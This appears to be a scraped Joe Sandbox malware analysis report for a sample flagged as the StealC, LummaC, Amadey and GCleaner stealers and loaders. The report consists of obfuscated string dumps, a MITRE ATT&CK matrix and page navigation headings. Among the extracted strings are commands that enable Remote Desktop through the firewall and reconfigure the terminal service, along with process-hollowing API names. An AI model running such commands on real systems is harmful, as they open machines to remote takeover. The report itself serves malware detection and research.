vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Extra Window Memory Injection	5 Obfuscated Files or Information	Security Account Manager	22 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	11 Registry Run Keys / Startup Folder	412 Process Injection	13 Software Packing	NTDS	249 System Information Discovery	Distributed Component Object Model	1 Email Collection	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	1 Timestomp	LSA Secrets	1 Query Registry	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	1071 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	461 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	461 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	412 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Mshta	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Threatname: GCleaner

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe